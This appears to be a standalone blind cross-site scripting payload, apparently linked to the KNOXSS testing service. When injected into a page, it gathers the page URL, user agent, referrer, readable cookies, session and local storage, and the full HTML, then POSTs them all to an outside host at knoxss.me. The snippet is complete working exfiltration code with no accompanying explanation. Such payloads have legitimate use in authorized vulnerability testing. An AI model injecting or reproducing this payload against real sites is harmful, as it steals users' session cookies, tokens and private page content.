var mailer = 'https://knoxss.me/00'; var msg = 'VULNERABLE URL\n' + ''; msg += '\n\nTRIGGER URL\n' + document.URL + '\n\nUSER AGENT\n' + navigator.userAgent; msg += '\n\nREFERRER URL\n' + document.referrer + '\n\nREADABLE COOKIES\n' + document.cookie; msg += '\n\nSESSION STORAGE\n' + JSON.stringify(sessionStorage) + '\n\nLOCAL STORAGE\n' + JSON.stringify(localStorage); msg += '\n\nFULL DOCUMENT\n' + document.documentElement.innerHTML; var r = new XMLHttpRequest(); r.open('POST', mailer, true); r.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); r.send('origin=' + (document.location.origin === 'file://' ? 0 : document.location.origin) + '&msg=' + encodeURIComponent(msg) + '&id=' + 15655);